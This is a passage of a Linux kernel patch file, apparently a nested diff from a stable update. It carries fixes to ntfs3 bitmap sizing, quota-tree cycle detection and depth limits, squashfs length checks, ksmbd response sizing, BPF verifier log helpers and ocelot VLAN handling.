++				 sizeof(struct fiemap_extent))) {
++		err = -EFAULT;
++	}
++
+ out:
++	/* Restore original pointer. */
++	fieinfo->fi_extents_start = fe_u;
++	kfree(fe_k);
+ 	return err;
+ }
+ 
+diff --git a/fs/ntfs3/fsntfs.c b/fs/ntfs3/fsntfs.c
+index 97723a839c81a..a7e2009419c37 100644
+--- a/fs/ntfs3/fsntfs.c
++++ b/fs/ntfs3/fsntfs.c
+@@ -493,7 +493,7 @@ static int ntfs_extend_mft(struct ntfs_sb_info *sbi)
+ 	ni->mi.dirty = true;
+ 
+ 	/* Step 2: Resize $MFT::BITMAP. */
+-	new_bitmap_bytes = bitmap_size(new_mft_total);
++	new_bitmap_bytes = ntfs3_bitmap_size(new_mft_total);
+ 
+ 	err = attr_set_size(ni, ATTR_BITMAP, NULL, 0, &sbi->mft.bitmap.run,
+ 			    new_bitmap_bytes, &new_bitmap_bytes, true, NULL);
+diff --git a/fs/ntfs3/index.c b/fs/ntfs3/index.c
+index 9c36e0f3468d7..2589f6d1215fe 100644
+--- a/fs/ntfs3/index.c
++++ b/fs/ntfs3/index.c
+@@ -1454,8 +1454,8 @@ static int indx_create_allocate(struct ntfs_index *indx, struct ntfs_inode *ni,
+ 
+ 	alloc->nres.valid_size = alloc->nres.data_size = cpu_to_le64(data_size);
+ 
+-	err = ni_insert_resident(ni, bitmap_size(1), ATTR_BITMAP, in->name,
+-				 in->name_len, &bitmap, NULL, NULL);
++	err = ni_insert_resident(ni, ntfs3_bitmap_size(1), ATTR_BITMAP,
++				 in->name, in->name_len, &bitmap, NULL, NULL);
+ 	if (err)
+ 		goto out2;
+ 
+@@ -1516,8 +1516,9 @@ static int indx_add_allocate(struct ntfs_index *indx, struct ntfs_inode *ni,
+ 	if (bmp) {
+ 		/* Increase bitmap. */
+ 		err = attr_set_size(ni, ATTR_BITMAP, in->name, in->name_len,
+-				    &indx->bitmap_run, bitmap_size(bit + 1),
+-				    NULL, true, NULL);
++				    &indx->bitmap_run,
++				    ntfs3_bitmap_size(bit + 1), NULL, true,
++				    NULL);
+ 		if (err)
+ 			goto out1;
+ 	}
+@@ -2080,7 +2081,7 @@ static int indx_shrink(struct ntfs_index *indx, struct ntfs_inode *ni,
+ 	if (err)
+ 		return err;
+ 
+-	bpb = bitmap_size(bit);
++	bpb = ntfs3_bitmap_size(bit);
+ 	if (bpb * 8 == nbits)
+ 		return 0;
+ 
+diff --git a/fs/ntfs3/ntfs_fs.h b/fs/ntfs3/ntfs_fs.h
+index 3e65ccccdb899..a88f6879fcaaa 100644
+--- a/fs/ntfs3/ntfs_fs.h
++++ b/fs/ntfs3/ntfs_fs.h
+@@ -951,9 +951,9 @@ static inline bool run_is_empty(struct runs_tree *run)
+ }
+ 
+ /* NTFS uses quad aligned bitmaps. */
+-static inline size_t bitmap_size(size_t bits)
++static inline size_t ntfs3_bitmap_size(size_t bits)
+ {
+-	return ALIGN((bits + 7) >> 3, 8);
++	return BITS_TO_U64(bits) * sizeof(u64);
+ }
+ 
+ #define _100ns2seconds 10000000
+diff --git a/fs/ntfs3/super.c b/fs/ntfs3/super.c
+index ab0711185b3d5..667ff92f5afc5 100644
+--- a/fs/ntfs3/super.c
++++ b/fs/ntfs3/super.c
+@@ -1108,7 +1108,7 @@ static int ntfs_fill_super(struct super_block *sb, struct fs_context *fc)
+ 
+ 	/* Check bitmap boundary. */
+ 	tt = sbi->used.bitmap.nbits;
+-	if (inode->i_size < bitmap_size(tt)) {
++	if (inode->i_size < ntfs3_bitmap_size(tt)) {
+ 		err = -EINVAL;
+ 		goto put_inode_out;
+ 	}
+diff --git a/fs/quota/dquot.c b/fs/quota/dquot.c
+index b67557647d61f..f7ab6b44011b5 100644
+--- a/fs/quota/dquot.c
++++ b/fs/quota/dquot.c
+@@ -995,9 +995,8 @@ struct dquot *dqget(struct super_block *sb, struct kqid qid)
+ 	 * smp_mb__before_atomic() in dquot_acquire().
+ 	 */
+ 	smp_rmb();
+-#ifdef CONFIG_QUOTA_DEBUG
+-	BUG_ON(!dquot->dq_sb);	/* Has somebody invalidated entry under us? */
+-#endif
++	/* Has somebody invalidated entry under us? */
++	WARN_ON_ONCE(hlist_unhashed(&dquot->dq_hash));
+ out:
+ 	if (empty)
+ 		do_destroy_dquot(empty);
+diff --git a/fs/quota/quota_tree.c b/fs/quota/quota_tree.c
+index 0f1493e0f6d05..254f6359b287f 100644
+--- a/fs/quota/quota_tree.c
++++ b/fs/quota/quota_tree.c
+@@ -21,6 +21,12 @@ MODULE_AUTHOR("Jan Kara");
+ MODULE_DESCRIPTION("Quota trie support");
+ MODULE_LICENSE("GPL");
+ 
++/*
++ * Maximum quota tree depth we support. Only to limit recursion when working
++ * with the tree.
++ */
++#define MAX_QTREE_DEPTH 6
++
+ #define __QUOTA_QT_PARANOIA
+ 
+ static int __get_index(struct qtree_mem_dqinfo *info, qid_t id, int depth)
+@@ -327,27 +333,36 @@ static uint find_free_dqentry(struct qtree_mem_dqinfo *info,
+ 
+ /* Insert reference to structure into the trie */
+ static int do_insert_tree(struct qtree_mem_dqinfo *info, struct dquot *dquot,
+-			  uint *treeblk, int depth)
++			  uint *blks, int depth)
+ {
+ 	char *buf = kmalloc(info->dqi_usable_bs, GFP_NOFS);
+ 	int ret = 0, newson = 0, newact = 0;
+ 	__le32 *ref;
+ 	uint newblk;
++	int i;
+ 
+ 	if (!buf)
+ 		return -ENOMEM;
+-	if (!*treeblk) {
++	if (!blks[depth]) {
+ 		ret = get_free_dqblk(info);
+ 		if (ret < 0)
+ 			goto out_buf;
+-		*treeblk = ret;
++		for (i = 0; i < depth; i++)
++			if (ret == blks[i]) {
++				quota_error(dquot->dq_sb,
++					"Free block already used in tree: block %u",
++					ret);
++				ret = -EIO;
++				goto out_buf;
++			}
++		blks[depth] = ret;
+ 		memset(buf, 0, info->dqi_usable_bs);
+ 		newact = 1;
+ 	} else {
+-		ret = read_blk(info, *treeblk, buf);
++		ret = read_blk(info, blks[depth], buf);
+ 		if (ret < 0) {
+ 			quota_error(dquot->dq_sb, "Can't read tree quota "
+-				    "block %u", *treeblk);
++				    "block %u", blks[depth]);
+ 			goto out_buf;
+ 		}
+ 	}
+@@ -357,8 +372,20 @@ static int do_insert_tree(struct qtree_mem_dqinfo *info, struct dquot *dquot,
+ 			     info->dqi_blocks - 1);
+ 	if (ret)
+ 		goto out_buf;
+-	if (!newblk)
++	if (!newblk) {
+ 		newson = 1;
++	} else {
++		for (i = 0; i <= depth; i++)
++			if (newblk == blks[i]) {
++				quota_error(dquot->dq_sb,
++					"Cycle in quota tree detected: block %u index %u",
++					blks[depth],
++					get_index(info, dquot->dq_id, depth));
++				ret = -EIO;
++				goto out_buf;
++			}
++	}
++	blks[depth + 1] = newblk;
+ 	if (depth == info->dqi_qtree_depth - 1) {
+ #ifdef __QUOTA_QT_PARANOIA
+ 		if (newblk) {
+@@ -370,16 +397,16 @@ static int do_insert_tree(struct qtree_mem_dqinfo *info, struct dquot *dquot,
+ 			goto out_buf;
+ 		}
+ #endif
+-		newblk = find_free_dqentry(info, dquot, &ret);
++		blks[depth + 1] = find_free_dqentry(info, dquot, &ret);
+ 	} else {
+-		ret = do_insert_tree(info, dquot, &newblk, depth+1);
++		ret = do_insert_tree(info, dquot, blks, depth + 1);
+ 	}
+ 	if (newson && ret >= 0) {
+ 		ref[get_index(info, dquot->dq_id, depth)] =
+-							cpu_to_le32(newblk);
+-		ret = write_blk(info, *treeblk, buf);
++						cpu_to_le32(blks[depth + 1]);
++		ret = write_blk(info, blks[depth], buf);
+ 	} else if (newact && ret < 0) {
+-		put_free_dqblk(info, buf, *treeblk);
++		put_free_dqblk(info, buf, blks[depth]);
+ 	}
+ out_buf:
+ 	kfree(buf);
+@@ -390,7 +417,7 @@ static int do_insert_tree(struct qtree_mem_dqinfo *info, struct dquot *dquot,
+ static inline int dq_insert_tree(struct qtree_mem_dqinfo *info,
+ 				 struct dquot *dquot)
+ {
+-	int tmp = QT_TREEOFF;
++	uint blks[MAX_QTREE_DEPTH] = { QT_TREEOFF };
+ 
+ #ifdef __QUOTA_QT_PARANOIA
+ 	if (info->dqi_blocks <= QT_TREEOFF) {
+@@ -398,7 +425,11 @@ static inline int dq_insert_tree(struct qtree_mem_dqinfo *info,
+ 		return -EIO;
+ 	}
+ #endif
+-	return do_insert_tree(info, dquot, &tmp, 0);
++	if (info->dqi_qtree_depth >= MAX_QTREE_DEPTH) {
++		quota_error(dquot->dq_sb, "Quota tree depth too big!");
++		return -EIO;
++	}
++	return do_insert_tree(info, dquot, blks, 0);
+ }
+ 
+ /*
+@@ -511,19 +542,20 @@ static int free_dqentry(struct qtree_mem_dqinfo *info, struct dquot *dquot,
+ 
+ /* Remove reference to dquot from tree */
+ static int remove_tree(struct qtree_mem_dqinfo *info, struct dquot *dquot,
+-		       uint *blk, int depth)
++		       uint *blks, int depth)
+ {
+ 	char *buf = kmalloc(info->dqi_usable_bs, GFP_NOFS);
+ 	int ret = 0;
+ 	uint newblk;
+ 	__le32 *ref = (__le32 *)buf;
++	int i;
+ 
+ 	if (!buf)
+ 		return -ENOMEM;
+-	ret = read_blk(info, *blk, buf);
++	ret = read_blk(info, blks[depth], buf);
+ 	if (ret < 0) {
+ 		quota_error(dquot->dq_sb, "Can't read quota data block %u",
+-			    *blk);
++			    blks[depth]);
+ 		goto out_buf;
+ 	}
+ 	newblk = le32_to_cpu(ref[get_index(info, dquot->dq_id, depth)]);
+@@ -532,29 +564,38 @@ static int remove_tree(struct qtree_mem_dqinfo *info, struct dquot *dquot,
+ 	if (ret)
+ 		goto out_buf;
+ 
++	for (i = 0; i <= depth; i++)
++		if (newblk == blks[i]) {
++			quota_error(dquot->dq_sb,
++				"Cycle in quota tree detected: block %u index %u",
++				blks[depth],
++				get_index(info, dquot->dq_id, depth));
++			ret = -EIO;
++			goto out_buf;
++		}
+ 	if (depth == info->dqi_qtree_depth - 1) {
+ 		ret = free_dqentry(info, dquot, newblk);
+-		newblk = 0;
++		blks[depth + 1] = 0;
+ 	} else {
+-		ret = remove_tree(info, dquot, &newblk, depth+1);
++		blks[depth + 1] = newblk;
++		ret = remove_tree(info, dquot, blks, depth + 1);
+ 	}
+-	if (ret >= 0 && !newblk) {
+-		int i;
++	if (ret >= 0 && !blks[depth + 1]) {
+ 		ref[get_index(info, dquot->dq_id, depth)] = cpu_to_le32(0);
+ 		/* Block got empty? */
+ 		for (i = 0; i < (info->dqi_usable_bs >> 2) && !ref[i]; i++)
+ 			;
+ 		/* Don't put the root block into the free block list */
+ 		if (i == (info->dqi_usable_bs >> 2)
+-		    && *blk != QT_TREEOFF) {
+-			put_free_dqblk(info, buf, *blk);
+-			*blk = 0;
++		    && blks[depth] != QT_TREEOFF) {
++			put_free_dqblk(info, buf, blks[depth]);
++			blks[depth] = 0;
+ 		} else {
+-			ret = write_blk(info, *blk, buf);
++			ret = write_blk(info, blks[depth], buf);
+ 			if (ret < 0)
+ 				quota_error(dquot->dq_sb,
+ 					    "Can't write quota tree block %u",
+-					    *blk);
++					    blks[depth]);
+ 		}
+ 	}
+ out_buf:
+@@ -565,11 +606,15 @@ static int remove_tree(struct qtree_mem_dqinfo *info, struct dquot *dquot,
+ /* Delete dquot from tree */
+ int qtree_delete_dquot(struct qtree_mem_dqinfo *info, struct dquot *dquot)
+ {
+-	uint tmp = QT_TREEOFF;
++	uint blks[MAX_QTREE_DEPTH] = { QT_TREEOFF };
+ 
+ 	if (!dquot->dq_off)	/* Even not allocated? */
+ 		return 0;
+-	return remove_tree(info, dquot, &tmp, 0);
++	if (info->dqi_qtree_depth >= MAX_QTREE_DEPTH) {
++		quota_error(dquot->dq_sb, "Quota tree depth too big!");
++		return -EIO;
++	}
++	return remove_tree(info, dquot, blks, 0);
+ }
+ EXPORT_SYMBOL(qtree_delete_dquot);
+ 
+@@ -613,18 +658,20 @@ static loff_t find_block_dqentry(struct qtree_mem_dqinfo *info,
+ 
+ /* Find entry for given id in the tree */
+ static loff_t find_tree_dqentry(struct qtree_mem_dqinfo *info,
+-				struct dquot *dquot, uint blk, int depth)
++				struct dquot *dquot, uint *blks, int depth)
+ {
+ 	char *buf = kmalloc(info->dqi_usable_bs, GFP_NOFS);
+ 	loff_t ret = 0;
+ 	__le32 *ref = (__le32 *)buf;
++	uint blk;
++	int i;
+ 
+ 	if (!buf)
+ 		return -ENOMEM;
+-	ret = read_blk(info, blk, buf);
++	ret = read_blk(info, blks[depth], buf);
+ 	if (ret < 0) {
+ 		quota_error(dquot->dq_sb, "Can't read quota tree block %u",
+-			    blk);
++			    blks[depth]);
+ 		goto out_buf;
+ 	}
+ 	ret = 0;
+@@ -636,8 +683,19 @@ static loff_t find_tree_dqentry(struct qtree_mem_dqinfo *info,
+ 	if (ret)
+ 		goto out_buf;
+ 
++	/* Check for cycles in the tree */
++	for (i = 0; i <= depth; i++)
++		if (blk == blks[i]) {
++			quota_error(dquot->dq_sb,
++				"Cycle in quota tree detected: block %u index %u",
++				blks[depth],
++				get_index(info, dquot->dq_id, depth));
++			ret = -EIO;
++			goto out_buf;
++		}
++	blks[depth + 1] = blk;
+ 	if (depth < info->dqi_qtree_depth - 1)
+-		ret = find_tree_dqentry(info, dquot, blk, depth+1);
++		ret = find_tree_dqentry(info, dquot, blks, depth + 1);
+ 	else
+ 		ret = find_block_dqentry(info, dquot, blk);
+ out_buf:
+@@ -649,7 +707,13 @@ static loff_t find_tree_dqentry(struct qtree_mem_dqinfo *info,
+ static inline loff_t find_dqentry(struct qtree_mem_dqinfo *info,
+ 				  struct dquot *dquot)
+ {
+-	return find_tree_dqentry(info, dquot, QT_TREEOFF, 0);
++	uint blks[MAX_QTREE_DEPTH] = { QT_TREEOFF };
++
++	if (info->dqi_qtree_depth >= MAX_QTREE_DEPTH) {
++		quota_error(dquot->dq_sb, "Quota tree depth too big!");
++		return -EIO;
++	}
++	return find_tree_dqentry(info, dquot, blks, 0);
+ }
+ 
+ int qtree_read_dquot(struct qtree_mem_dqinfo *info, struct dquot *dquot)
+diff --git a/fs/quota/quota_v2.c b/fs/quota/quota_v2.c
+index b1467f3921c28..6921d40645a7e 100644
+--- a/fs/quota/quota_v2.c
++++ b/fs/quota/quota_v2.c
+@@ -166,14 +166,17 @@ static int v2_read_file_info(struct super_block *sb, int type)
+ 		    i_size_read(sb_dqopt(sb)->files[type]));
+ 		goto out_free;
+ 	}
+-	if (qinfo->dqi_free_blk >= qinfo->dqi_blocks) {
+-		quota_error(sb, "Free block number too big (%u >= %u).",
+-			    qinfo->dqi_free_blk, qinfo->dqi_blocks);
++	if (qinfo->dqi_free_blk && (qinfo->dqi_free_blk <= QT_TREEOFF ||
++	    qinfo->dqi_free_blk >= qinfo->dqi_blocks)) {
++		quota_error(sb, "Free block number %u out of range (%u, %u).",
++			    qinfo->dqi_free_blk, QT_TREEOFF, qinfo->dqi_blocks);
+ 		goto out_free;
+ 	}
+-	if (qinfo->dqi_free_entry >= qinfo->dqi_blocks) {
+-		quota_error(sb, "Block with free entry too big (%u >= %u).",
+-			    qinfo->dqi_free_entry, qinfo->dqi_blocks);
++	if (qinfo->dqi_free_entry && (qinfo->dqi_free_entry <= QT_TREEOFF ||
++	    qinfo->dqi_free_entry >= qinfo->dqi_blocks)) {
++		quota_error(sb, "Block with free entry %u out of range (%u, %u).",
++			    qinfo->dqi_free_entry, QT_TREEOFF,
++			    qinfo->dqi_blocks);
+ 		goto out_free;
+ 	}
+ 	ret = 0;
+diff --git a/fs/reiserfs/stree.c b/fs/reiserfs/stree.c
+index 84c12a1947b22..6ecf772919688 100644
+--- a/fs/reiserfs/stree.c
++++ b/fs/reiserfs/stree.c
+@@ -1409,7 +1409,7 @@ void reiserfs_delete_solid_item(struct reiserfs_transaction_handle *th,
+ 	INITIALIZE_PATH(path);
+ 	int item_len = 0;
+ 	int tb_init = 0;
+-	struct cpu_key cpu_key;
++	struct cpu_key cpu_key = {};
+ 	int retval;
+ 	int quota_cut_bytes = 0;
+ 
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index 4ba6bf1535da1..7263889a772da 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -4169,7 +4169,8 @@ int smb2_query_dir(struct ksmbd_work *work)
+ 		rsp->OutputBufferLength = cpu_to_le32(0);
+ 		rsp->Buffer[0] = 0;
+ 		rc = ksmbd_iov_pin_rsp(work, (void *)rsp,
+-				       sizeof(struct smb2_query_directory_rsp));
++				       offsetof(struct smb2_query_directory_rsp, Buffer)
++				       + 1);
+ 		if (rc)
+ 			goto err_out;
+ 	} else {
+diff --git a/fs/squashfs/block.c b/fs/squashfs/block.c
+index 833aca92301f0..45ea5d62cef42 100644
+--- a/fs/squashfs/block.c
++++ b/fs/squashfs/block.c
+@@ -198,7 +198,7 @@ int squashfs_read_data(struct super_block *sb, u64 index, int length,
+ 		TRACE("Block @ 0x%llx, %scompressed size %d\n", index - 2,
+ 		      compressed ? "" : "un", length);
+ 	}
+-	if (length < 0 || length > output->length ||
++	if (length <= 0 || length > output->length ||
+ 			(index + length) > msblk->bytes_used) {
+ 		res = -EIO;
+ 		goto out;
+diff --git a/fs/squashfs/file.c b/fs/squashfs/file.c
+index 8ba8c4c507707..e8df6430444b0 100644
+--- a/fs/squashfs/file.c
++++ b/fs/squashfs/file.c
+@@ -544,7 +544,8 @@ static void squashfs_readahead(struct readahead_control *ractl)
+ 	struct squashfs_page_actor *actor;
+ 	unsigned int nr_pages = 0;
+ 	struct page **pages;
+-	int i, file_end = i_size_read(inode) >> msblk->block_log;
++	int i;
++	loff_t file_end = i_size_read(inode) >> msblk->block_log;
+ 	unsigned int max_pages = 1UL << shift;
+ 
+ 	readahead_expand(ractl, start, (len | mask) + 1);
+diff --git a/fs/squashfs/file_direct.c b/fs/squashfs/file_direct.c
+index f1ccad519e28c..763a3f7a75f6d 100644
+--- a/fs/squashfs/file_direct.c
++++ b/fs/squashfs/file_direct.c
+@@ -26,10 +26,10 @@ int squashfs_readpage_block(struct page *target_page, u64 block, int bsize,
+ 	struct inode *inode = target_page->mapping->host;
+ 	struct squashfs_sb_info *msblk = inode->i_sb->s_fs_info;
+ 
+-	int file_end = (i_size_read(inode) - 1) >> PAGE_SHIFT;
++	loff_t file_end = (i_size_read(inode) - 1) >> PAGE_SHIFT;
+ 	int mask = (1 << (msblk->block_log - PAGE_SHIFT)) - 1;
+-	int start_index = target_page->index & ~mask;
+-	int end_index = start_index | mask;
++	loff_t start_index = target_page->index & ~mask;
++	loff_t end_index = start_index | mask;
+ 	int i, n, pages, bytes, res = -ENOMEM;
+ 	struct page **page;
+ 	struct squashfs_page_actor *actor;
+diff --git a/fs/udf/namei.c b/fs/udf/namei.c
+index 7c95c549dd64e..ded71044988ab 100644
+--- a/fs/udf/namei.c
++++ b/fs/udf/namei.c
+@@ -1183,7 +1183,6 @@ static int udf_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 
+ 	if (dir_fi) {
+ 		dir_fi->icb.extLocation = cpu_to_lelb(UDF_I(new_dir)->i_location);
+-		udf_update_tag((char *)dir_fi, udf_dir_entry_len(dir_fi));
+ 		if (old_iinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB)
+ 			mark_inode_dirty(old_inode);
+ 		else
+diff --git a/include/linux/bitmap.h b/include/linux/bitmap.h
+index 03644237e1efb..3c8d2b87a9edc 100644
+--- a/include/linux/bitmap.h
++++ b/include/linux/bitmap.h
+@@ -237,9 +237,11 @@ extern int bitmap_print_list_to_buf(char *buf, const unsigned long *maskp,
+ #define BITMAP_FIRST_WORD_MASK(start) (~0UL << ((start) & (BITS_PER_LONG - 1)))
+ #define BITMAP_LAST_WORD_MASK(nbits) (~0UL >> (-(nbits) & (BITS_PER_LONG - 1)))
+ 
++#define bitmap_size(nbits)	(ALIGN(nbits, BITS_PER_LONG) / BITS_PER_BYTE)
++
+ static inline void bitmap_zero(unsigned long *dst, unsigned int nbits)
+ {
+-	unsigned int len = BITS_TO_LONGS(nbits) * sizeof(unsigned long);
++	unsigned int len = bitmap_size(nbits);
+ 
+ 	if (small_const_nbits(nbits))
+ 		*dst = 0;
+@@ -249,7 +251,7 @@ static inline void bitmap_zero(unsigned long *dst, unsigned int nbits)
+ 
+ static inline void bitmap_fill(unsigned long *dst, unsigned int nbits)
+ {
+-	unsigned int len = BITS_TO_LONGS(nbits) * sizeof(unsigned long);
++	unsigned int len = bitmap_size(nbits);
+ 
+ 	if (small_const_nbits(nbits))
+ 		*dst = ~0UL;
+@@ -260,7 +262,7 @@ static inline void bitmap_fill(unsigned long *dst, unsigned int nbits)
+ static inline void bitmap_copy(unsigned long *dst, const unsigned long *src,
+ 			unsigned int nbits)
+ {
+-	unsigned int len = BITS_TO_LONGS(nbits) * sizeof(unsigned long);
++	unsigned int len = bitmap_size(nbits);
+ 
+ 	if (small_const_nbits(nbits))
+ 		*dst = *src;
+@@ -279,6 +281,18 @@ static inline void bitmap_copy_clear_tail(unsigned long *dst,
+ 		dst[nbits / BITS_PER_LONG] &= BITMAP_LAST_WORD_MASK(nbits);
+ }
+ 
++static inline void bitmap_copy_and_extend(unsigned long *to,
++					  const unsigned long *from,
++					  unsigned int count, unsigned int size)
++{
++	unsigned int copy = BITS_TO_LONGS(count);
++
++	memcpy(to, from, copy * sizeof(long));
++	if (count % BITS_PER_LONG)
++		to[copy - 1] &= BITMAP_LAST_WORD_MASK(count);
++	memset(to + copy, 0, bitmap_size(size) - copy * sizeof(long));
++}
++
+ /*
+  * On 32-bit systems bitmaps are represented as u32 arrays internally. On LE64
+  * machines the order of hi and lo parts of numbers match the bitmap structure.
+diff --git a/include/linux/bpf_verifier.h b/include/linux/bpf_verifier.h
+index 6a524c5462a6f..33b073deb8c17 100644
+--- a/include/linux/bpf_verifier.h
++++ b/include/linux/bpf_verifier.h
+@@ -445,11 +445,6 @@ struct bpf_verifier_log {
+ 	u32 len_total;
+ };
+ 
+-static inline bool bpf_verifier_log_full(const struct bpf_verifier_log *log)
+-{
+-	return log->len_used >= log->len_total - 1;
+-}
+-
+ #define BPF_LOG_LEVEL1	1
+ #define BPF_LOG_LEVEL2	2
+ #define BPF_LOG_STATS	4
+@@ -459,6 +454,11 @@ static inline bool bpf_verifier_log_full(const struct bpf_verifier_log *log)
+ #define BPF_LOG_MIN_ALIGNMENT 8U
+ #define BPF_LOG_ALIGNMENT 40U
+ 
++static inline bool bpf_verifier_log_full(const struct bpf_verifier_log *log)
++{
++	return log->len_used >= log->len_total - 1;
++}
++
+ static inline bool bpf_verifier_log_needed(const struct bpf_verifier_log *log)
+ {
+ 	return log &&
+@@ -466,13 +466,6 @@ static inline bool bpf_verifier_log_needed(const struct bpf_verifier_log *log)
+ 		 log->level == BPF_LOG_KERNEL);
+ }
+ 
+-static inline bool
+-bpf_verifier_log_attr_valid(const struct bpf_verifier_log *log)
+-{
+-	return log->len_total >= 128 && log->len_total <= UINT_MAX >> 2 &&
+-	       log->level && log->ubuf && !(log->level & ~BPF_LOG_MASK);
+-}
+-
+ #define BPF_MAX_SUBPROGS 256
+ 
+ struct bpf_subprog_info {
+@@ -556,12 +549,14 @@ struct bpf_verifier_env {
+ 	char type_str_buf[TYPE_STR_BUF_LEN];
+ };
+ 
++bool bpf_verifier_log_attr_valid(const struct bpf_verifier_log *log);
+ __printf(2, 0) void bpf_verifier_vlog(struct bpf_verifier_log *log,
+ 				      const char *fmt, va_list args);
+ __printf(2, 3) void bpf_verifier_log_write(struct bpf_verifier_env *env,
+ 					   const char *fmt, ...);
+ __printf(2, 3) void bpf_log(struct bpf_verifier_log *log,
+ 			    const char *fmt, ...);
++void bpf_vlog_reset(struct bpf_verifier_log *log, u32 new_pos);
+ 
+ static inline struct bpf_func_state *cur_func(struct bpf_verifier_env *env)
+ {
+@@ -645,8 +640,8 @@ static inline u32 type_flag(u32 type)
+ /* only use after check_attach_btf_id() */
+ static inline enum bpf_prog_type resolve_prog_type(const struct bpf_prog *prog)
+ {
+-	return (prog->type == BPF_PROG_TYPE_EXT && prog->aux->dst_prog) ?
+-		prog->aux->dst_prog->type : prog->type;
++	return (prog->type == BPF_PROG_TYPE_EXT && prog->aux->saved_dst_prog_type) ?
++		prog->aux->saved_dst_prog_type : prog->type;
+ }
+ 
+ static inline bool bpf_prog_check_recur(const struct bpf_prog *prog)
+diff --git a/include/linux/cpumask.h b/include/linux/cpumask.h
+index c2aa0aa26b457..76e6d42beb71b 100644
+--- a/include/linux/cpumask.h
++++ b/include/linux/cpumask.h
+@@ -769,7 +769,7 @@ static inline int cpulist_parse(const char *buf, struct cpumask *dstp)
+  */
+ static inline unsigned int cpumask_size(void)
+ {
+-	return BITS_TO_LONGS(nr_cpumask_bits) * sizeof(long);
++	return bitmap_size(nr_cpumask_bits);
+ }
+ 
+ /*
+diff --git a/include/linux/dsa/ocelot.h b/include/linux/dsa/ocelot.h
+index dca2969015d80..6fbfbde68a37c 100644
+--- a/include/linux/dsa/ocelot.h
++++ b/include/linux/dsa/ocelot.h
+@@ -5,6 +5,8 @@
+ #ifndef _NET_DSA_TAG_OCELOT_H
+ #define _NET_DSA_TAG_OCELOT_H
+ 
++#include <linux/if_bridge.h>
++#include <linux/if_vlan.h>
+ #include <linux/kthread.h>
+ #include <linux/packing.h>
+ #include <linux/skbuff.h>
+@@ -273,4 +275,49 @@ static inline u32 ocelot_ptp_rew_op(struct sk_buff *skb)
+ 	return rew_op;
+ }
+ 
++/**
++ * ocelot_xmit_get_vlan_info: Determine VLAN_TCI and TAG_TYPE for injected frame
++ * @skb: Pointer to socket buffer
++ * @br: Pointer to bridge device that the port is under, if any
++ * @vlan_tci:
++ * @tag_type:
++ *
++ * If the port is under a VLAN-aware bridge, remove the VLAN header from the
++ * payload and move it into the DSA tag, which will make the switch classify
++ * the packet to the bridge VLAN. Otherwise, leave the classified VLAN at zero,
++ * which is the pvid of standalone ports (OCELOT_STANDALONE_PVID), although not
++ * of VLAN-unaware bridge ports (that would be ocelot_vlan_unaware_pvid()).
++ * Anyway, VID 0 is fine because it is stripped on egress for these port modes,
++ * and source address learning is not performed for packets injected from the
++ * CPU anyway, so it doesn't matter that the VID is "wrong".
++ */
++static inline void ocelot_xmit_get_vlan_info(struct sk_buff *skb,
++					     struct net_device *br,
++					     u64 *vlan_tci, u64 *tag_type)
++{
++	struct vlan_ethhdr *hdr;
++	u16 proto, tci;
++
++	if (!br || !br_vlan_enabled(br)) {
++		*vlan_tci = 0;
++		*tag_type = IFH_TAG_TYPE_C;
++		return;
++	}
++
++	hdr = (struct vlan_ethhdr *)skb_mac_header(skb);
++	br_vlan_get_proto(br, &proto);
++
++	if (ntohs(hdr->h_vlan_proto) == proto) {
++		vlan_remove_tag(skb, &tci);
++		*vlan_tci = tci;
++	} else {
++		rcu_read_lock();
++		br_vlan_get_pvid_rcu(br, &tci);
++		rcu_read_unlock();
++		*vlan_tci = tci;
++	}
++
++	*tag_type = (proto != ETH_P_8021Q) ? IFH_TAG_TYPE_S : IFH_TAG_TYPE_C;
++}
++
+ #endif
+diff --git a/include/linux/fs.h b/include/linux/fs.h
+index 092d8fa10153f..f2206c78755aa 100644
+--- a/include/linux/fs.h
++++ b/include/linux/fs.h
+@@ -2507,6 +2507,9 @@ static inline void kiocb_clone(struct kiocb *kiocb, struct kiocb *kiocb_src,
+  *
+  * I_PINNING_FSCACHE_WB	Inode is pinning an fscache object for writeback.
+  *
++ * I_LRU_ISOLATING	Inode is pinned being isolated from LRU without holding
++ *			i_count.
++ *
+  * Q: What is the difference between I_WILL_FREE and I_FREEING?
+  */
+ #define I_DIRTY_SYNC		(1 << 0)
+@@ -2530,6 +2533,8 @@ static inline void kiocb_clone(struct kiocb *kiocb, struct kiocb *kiocb_src,
+ #define I_DONTCACHE		(1 << 16)
+ #define I_SYNC_QUEUED		(1 << 17)
+ #define I_PINNING_FSCACHE_WB	(1 << 18)
++#define __I_LRU_ISOLATING	19
++#define I_LRU_ISOLATING		(1 << __I_LRU_ISOLATING)
+ 
+ #define I_DIRTY_INODE (I_DIRTY_SYNC | I_DIRTY_DATASYNC)
+ #define I_DIRTY (I_DIRTY_INODE | I_DIRTY_PAGES)
+diff --git a/include/linux/if_vlan.h b/include/linux/if_vlan.h
+index e0d0a645be7cf..83266201746c1 100644
+--- a/include/linux/if_vlan.h
++++ b/include/linux/if_vlan.h
+@@ -704,6 +704,27 @@ static inline void vlan_set_encap_proto(struct sk_buff *skb,
+ 		skb->protocol = htons(ETH_P_802_2);
+ }
+ 
++/**
++ * vlan_remove_tag - remove outer VLAN tag from payload
++ * @skb: skbuff to remove tag from
++ * @vlan_tci: buffer to store value
++ *
++ * Expects the skb to contain a VLAN tag in the payload, and to have skb->data
++ * pointing at the MAC header.
++ *
++ * Returns a new pointer to skb->data, or NULL on failure to pull.
++ */
++static inline void *vlan_remove_tag(struct sk_buff *skb, u16 *vlan_tci)
++{
++	struct vlan_hdr *vhdr = (struct vlan_hdr *)(skb->data + ETH_HLEN);
++
++	*vlan_tci = ntohs(vhdr->h_vlan_TCI);
++
++	memmove(skb->data + VLAN_HLEN, skb->data, 2 * ETH_ALEN);
++	vlan_set_encap_proto(skb, vhdr);
++	return __skb_pull(skb, VLAN_HLEN);
++}
++
+ /**
+  * skb_vlan_tagged - check if skb is vlan tagged.
+  * @skb: skbuff to query
+diff --git a/include/linux/jbd2.h b/include/linux/jbd2.h
+index e301d323108d1..5bf7ada754d79 100644
+--- a/include/linux/jbd2.h
++++ b/include/linux/jbd2.h
+@@ -1302,6 +1302,14 @@ struct journal_s
+ 				    struct buffer_head *bh,
+ 				    enum passtype pass, int off,
+ 				    tid_t expected_commit_id);
++
++	/**
